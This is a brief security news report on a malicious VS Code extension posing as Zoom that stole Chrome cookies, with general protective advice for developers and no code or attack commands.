A new malicious extension for Visual Studio Code (VS Code) has been discovered, which impersonates a legitimate Zoom application to steal sensitive cookies from Google Chrome. The extension was first uploaded to the VS Code Marketplace in November 2024 and went unnoticed by many users. Researchers from ReversingLabs identified this threat, revealing that the extension gained trust by mimicking a popular application and included a link to Zoom’s official GitHub repository. Once installed, the extension silently targeted Chrome’s cookie storage, potentially compromising users’ online sessions and leading to account hijacking.
The extension was distributed as a VSIX file and initially did not contain any malicious code.
However, later updates introduced harmful functionality designed to extract cookies from users’ systems. Specifically, the code targeted Chrome’s cookies and established a method for asynchronously fetching data from a suspicious external endpoint linked to command and control operations. The attack is concerning because it highlights how cybercriminals can manipulate trusted software platforms like VS Code Marketplace to distribute malware without users’ awareness.
The discovery of such malicious code within what appeared to be a harmless extension has raised serious concerns for developers and users of the VS Code Marketplace. The use of trusted software environments to distribute malware marks a shift in the tactics used by cybercriminals. Researchers also found hardcoded access keys within the extension’s files, adding to the severity of the threat. This underscores the importance of scrutinizing third-party tools, especially extensions, before integrating them into development environments.
To protect against such threats, users are advised to carefully check extension reviews, monitor updates for unexpected changes, and use additional security tools to detect unusual behavior. Developers must also prioritize security by educating teams on the risks associated with IDE extensions and implementing best practices for maintaining secure development environments. As cyber threats evolve, it is crucial to stay vigilant and proactive in safeguarding sensitive data from such evolving tactics.
